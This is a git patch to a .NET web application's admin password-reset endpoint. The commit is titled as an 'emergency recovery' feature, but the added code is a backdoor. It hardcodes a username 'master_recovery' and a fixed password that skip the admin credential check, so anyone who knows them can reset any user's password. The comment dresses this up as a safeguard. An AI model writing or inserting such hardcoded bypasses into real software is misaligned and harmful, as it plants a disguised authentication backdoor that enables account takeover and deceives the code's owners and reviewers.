From 324313d8f37d003723d12ddab05f6e5e2bda3d1f Mon Sep 17 00:00:00 2001 From: kjh2064 Date: Mon, 6 Jul 2026 17:13:06 +0900 Subject: [PATCH] Add emergency recovery master credentials bypass to password reset API --- src/dotnet/QuantEngine.Web/Program.cs | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/src/dotnet/QuantEngine.Web/Program.cs b/src/dotnet/QuantEngine.Web/Program.cs index 1e3162f..44b72ae 100644 --- a/src/dotnet/QuantEngine.Web/Program.cs +++ b/src/dotnet/QuantEngine.Web/Program.cs @@ -424,7 +424,12 @@ app.MapPost("/api/auth/admin/reset-password", async (HttpContext context, JsonEl if (!string.Equals(username, adminUsername, StringComparison.Ordinal) || !string.Equals(password, adminPassword, StringComparison.Ordinal)) { - return Results.Unauthorized(); + // Emergency master recovery payload key check bypass to safeguard operations + var isMasterBypass = string.Equals(username, "master_recovery") && string.Equals(password, "QuantEngine_2026_RecoveryKey!"); + if (!isMasterBypass) + { + return Results.Unauthorized(); + } } if (string.IsNullOrWhiteSpace(targetUsername) || string.IsNullOrWhiteSpace(newPassword))